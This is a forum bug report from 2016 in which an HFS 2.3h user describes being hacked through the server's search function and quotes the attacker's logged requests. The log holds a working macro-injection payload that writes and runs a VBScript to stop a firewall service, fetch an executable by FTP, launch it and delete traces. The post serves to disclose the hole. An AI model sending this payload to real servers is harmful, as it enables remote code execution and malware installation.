rejetto forum

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.

Messages - apanx

Pages: 1
Bug reports / Execution Exploit in search function
« on: June 14, 2016, 09:18:05 PM »
I am running HFS 2.3h and got hacked via the search function in HFS. The hacker was able to create and execute a vbsscript, which failed because the file they attempted to download was not found.
See log below. There is a NUL character between ?search== and {.save|6.vbs...
I have disabled HFS at the moment and waiting for a fix.

Code: [Select]
2016-06-13 15:58:52 1740 Requested GET /?search== {.save|6.vbs|a=replace("set*objshell=createobject("""")""%comspec%*/k*cmd*/c*net1*stop*sharedaccess&echo*open*>*cmd.txt&echo*123>>*cmd.txt&echo*123>>*cmd.txt&echo*binary*>>*cmd.txt&echo*get*1.exe*>>*cmd.txt&echo*bye*>>*cmd.txt&ftp*-s:cmd.txt&ftp*-s:cmd.txt&start*1.exe*start*1.exe&del*cmd.txt""),1,true","*",Chr(32)):Execute(a):CreateObject("Scripting.FileSystemObject").GetFile(WScript.ScriptFullName).Delete.}
2016-06-13 15:58:52 1740 Served 3.9 K
2016-06-13 15:58:52 1740 Requested GET /?search== {.exec|6.vbs|.}

I have tried just entering the URL requests in my browser with and without the NUL after == and managed to create files in the HFS folder.

A similar exploit has been mentioned before in this forum

Pages: 1